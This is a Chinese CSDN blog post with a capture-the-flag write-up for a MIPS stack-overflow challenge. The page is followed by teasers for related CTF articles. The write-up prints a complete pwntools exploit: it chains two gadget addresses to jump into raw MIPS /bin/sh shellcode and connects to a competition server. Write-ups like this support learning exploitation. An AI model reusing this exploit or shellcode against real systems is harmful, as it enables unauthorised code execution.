[XYCTF新生赛]-PWN:EZ1.0?(mips,mips的shellcode利用)

已于 2024-06-28 18:25:30 修改
阅读量405 收藏 5
点赞数 14
分类专栏: PWN 文章标签: 网络安全 安全
于 2024-06-28 18:24:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/140049025
版权

查看保护

查看ida

这里用的是retdec,没安装的可以看这个[CTF]-PWN:mips反汇编工具,ida插件retdec的安装-CSDN博客

 这里直接看反汇编貌似看不出什么,所以直接从汇编找

完整exp:

from pwn import*
context(log_level='debug',arch='mips')
p=process('./mips')
p=remote('gz.imxbt.cn',20045)
jmp_a2=0x0041FBF4
add_sp_jmp_fp=0x00427968


shellcode=b'\x50\x73\x06\x24\xff\xff\xd0\x04\x50\x73\x0f\x24\xff\xff\x06\x28'
shellcode+=b'\xe0\xff\xbd\x27\xd7\xff\x0f\x24\x27\x78\xe0\x01\x21\x20\xef\x03'
shellcode+=b'\xe8\xff\xa4\xaf\xec\xff\xa0\xaf\xe8\xff\xa5\x23\xab\x0f\x02\x24'
shellcode+=b'\x0c\x01\x01\x01/bin/sh'
payload=b'a'*0x40+p32(jmp_a2)+p32(add_sp_jmp_fp)+b'a'*0x58+shellcode
p.sendafter(b'welcome XYCTF mips world',payload)
p.interactive()

原来x86架构的shellcode是用不了的,这里是先覆盖fp为jmp a2,覆盖返回地址为add_sp_jmp_fp,执行add_sp_jmp_fp处汇编的时候会把shellcode的地址放入a2,而且会jmp fp,利用这一点执行shellcode。

clxhzg
关注
专栏目录
[Dest0g3 pwn] ez_pwn,ea_aarch,dest_love,ezuaf
weixin_52640415的博客
05-27 786
这回的pwn都用的高版本libc,各网站上一般都是2.23,2.27以前几年的题,高版本的很少,所以练了半天还不大会,只作了4个简单点的。另外两个已经弄到任意写了,但没找着往哪写管用放弃了。 ez_pwn 题目用到了abs,和scanf两个觉绕过,可以增加数据然后返回和,内存里本身是有残留的,在只输入减号(-)时scanf不修改返回内容,也就会把残留内容输出。导致泄露。另外abs对-1的处理会异至还是负1,可以绕过检查写越界。 int hackme() { int v1[10]; // [esp
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 716
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
[PWN] shellcode 2016_ez_pz_hackover
LDX的博客
12-01 386
PEN 栈溢出写入shellcode ez_pz_hackover_2016 BUUCTF刷题
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3841
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
[Byte Bandits 2023] 部分
weixin_52640415的博客
02-07 677
Byte Bandits 2023
CTF-pwn pwntools用法探索_usage pwn checksec [-h] [--file [elf
2401_84254011的博客
04-26 414
options:options:options:options:options:options:options:options:options:还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1257
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1243
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
pwn调整栈帧的技巧
sea_time的博客
12-05 1119
调整栈帧的技巧 我们在存在栈溢出程序中,经常会碰到一些关于栈的问题,比如开启ASLR导致栈地址不可预测,所能溢出的字节数太少等等。对于这些问题,我们有时候可以通过gadgets来调整栈帧以完成攻击。比如我们所用到的常见手段,包括esp值的加减,利用部分溢出字节来修改ebp的值来进行stack pivoting等。 0x00 扩大栈空间 正常来说,当栈空间不够用时我们是写入bss段中的,那有什么办...
python3-pwntools教程_python的pwntools工具的日常使用
weixin_36050894的博客
12-23 1160
1.安装操作系统:ubuntu16.04环境准备:pythonpiplibssl-devlibffi-devpwntools安装:sudo apt-get install libffi-devsudo apt-get install libssl-devsudo apt-get install pythonsudo apt-get install python-pipsudo pip instal...
XJUSEC2021战队考核wp
weixin_51701860的博客
09-17 1226
xjusec考核wp REVERSE: justbase64 这个题是以前看见过的一个类似的题,ida打开 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jfsPV2Bp-1631845505429)(D:\blog\Pr0b1emBlog\source\img\image-20210825211051630.png)] 这边目录看见encode_one,encode_two,encode_three三个编码,右边主函数里就是三次编码后形成的"EmBmP5Pmn7QcPU4
HSC-1th 2022 48h大 write-up
zgzhzywzd的博客
03-18 863
HSC-1th大-Writeup 比是一月份的,整理了下writeup,CSDN上也发一下份吧。 MISC 0x01 Sign-in 前往红客突击队公众号发送“HSC2019”并签到吧! 0x02 DORAEMON 下载后doraemon.zip,压缩软件打开有提示:哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗? 用Advanced Archive Password Recovery爆破得到6为数字密码:376852 解压后得到一张哆啦A梦的图片,根据提示利用tweakpn
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2368
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
memcpy
weixin_45959515的博客
08-26 178
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
1.pwn基础总结
热门推荐
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
2021年“绿城杯”网络安全-PWN-ezuaf
qq_43264813的博客
09-30 316
2021年“绿城杯”网络安全-PWN-ezuaf 题目名称:ezuaf 题目内容:简单的uaf 题目分值:100.0 题目难度:容易 相关附件:ezuaf的附件24.txt 解题思路: 1.检查保护 2.函数分析 发现Delete中有uaf 3.思路 打malloc_hook exp from pwn import * #io = process('./uaf_pwn') io = remote('82.157.5.28',52402) elf = ELF('./uaf_pwn') libc
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8461
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024 年浙江省网络安全行业网络安全运维工程师项目 职业技能竞网络安全运维工程师(决样题)
最新发布
Aluxian_的博客
09-13 838
作为一名网络安全运维工程师,你发现公司的内部网络出现了异常流量,多个关键应用程序的响应速度显著下降,你需要对网络流量进行深入分析,识别潜在的安全威胁,追踪可疑活动,以确保公司数据的安全性。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值